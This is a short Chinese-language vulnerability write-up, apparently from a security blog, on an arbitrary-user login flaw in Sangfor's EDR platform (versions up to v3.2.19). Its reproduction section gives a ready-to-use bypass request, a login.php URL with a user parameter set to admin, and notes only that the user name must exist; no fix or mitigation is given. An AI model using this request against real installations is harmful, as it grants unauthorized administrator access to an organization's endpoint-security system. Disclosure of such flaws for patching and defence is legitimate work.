深信服后台任意用户登陆漏洞

# 深信服后台任意用户登陆漏洞

## 漏洞描述

深信服终端检测响应平台是深信服公司开发的一套EDR系统。攻击者利用该漏洞,登录任意用户

## 影响版本

> [!NOTE]
>
> EDR <= v3.2.19 ## 漏洞复现 https://xxx.xxx.xxx.xxx/ui/login.php?user=admin > [!NOTE]
>
> 注意最后的admin需要为存在的用户名

![](./image/sxf-2.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容